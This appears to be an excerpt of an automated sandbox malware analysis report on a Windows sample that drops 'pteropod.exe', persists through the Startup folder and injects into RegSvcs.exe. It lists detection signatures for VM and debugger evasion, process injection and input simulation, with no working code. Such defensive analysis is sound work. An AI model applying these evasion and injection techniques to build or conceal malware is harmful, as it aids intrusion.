Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00444078 0_2_00444078
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00444078 1_2_00444078
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00444078 5_2_00444078
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API/Special instruction interceptor: Address: 3E4C6B4
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API/Special instruction interceptor: Address: 3BA862C
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7215 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 2602 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\7xonkSJwuY.exe API coverage: 3.3 %
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API coverage: 3.5 %
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe API coverage: 3.4 %
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452126
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 0_2_0045C999
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00436ADE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00434BEE
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 0_2_00436D2D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442E1F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045DD7C FindFirstFileW,FindClose, 0_2_0045DD7C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD29
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00475FE5
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 1_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 1_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 1_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0045DD7C FindFirstFileW,FindClose, 1_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 1_2_0044BD29
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 1_2_0044BF8D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose, 5_2_00452126
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045C999 FindFirstFileW,FindNextFileW,FindClose, 5_2_0045C999
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose, 5_2_00436ADE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00434BEE
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle, 5_2_00436D2D
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 5_2_00442E1F
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0045DD7C FindFirstFileW,FindClose, 5_2_0045DD7C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 5_2_0044BD29
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_0044BF8D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: pteropod.exe, 00000001.00000002.1710250692.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1700281231.0000000003084000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OKSBRDRMWQEMu
Source: RegSvcs.exe, 00000002.00000002.1927969800.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07088F60 LdrInitializeThunk, 2_2_07088F60
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045A259 BlockInput, 0_2_0045A259
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8F190 mov eax, dword ptr fs:[00000030h] 0_2_03E8F190
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8F130 mov eax, dword ptr fs:[00000030h] 0_2_03E8F130
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8DAB0 mov eax, dword ptr fs:[00000030h] 0_2_03E8DAB0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4B2A0 mov eax, dword ptr fs:[00000030h] 1_2_03E4B2A0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4C980 mov eax, dword ptr fs:[00000030h] 1_2_03E4C980
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4C920 mov eax, dword ptr fs:[00000030h] 1_2_03E4C920
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA7218 mov eax, dword ptr fs:[00000030h] 5_2_03BA7218
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA8898 mov eax, dword ptr fs:[00000030h] 5_2_03BA8898
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA88F8 mov eax, dword ptr fs:[00000030h] 5_2_03BA88F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_00426DA1
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter, 0_2_0042202E
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004230F5
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417D93
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00421FA7
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0042202E SetUnhandledExceptionFilter, 1_2_0042202E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004230F5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00417D93
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00421FA7
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0042202E SetUnhandledExceptionFilter, 5_2_0042202E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_004230F5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00417D93
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00421FA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6F3008 Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 2FD008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0043916A LogonUserW, 0_2_0043916A
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_00436431
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7xonkSJwuY.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe" Jump to behavior
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00445DD3
Source: pteropod.exe Binary or memory string: Shell_TrayWnd
Source: 7xonkSJwuY.exe, pteropod.exe.0.dr Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00410D10 cpuid 0_2_00410D10
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
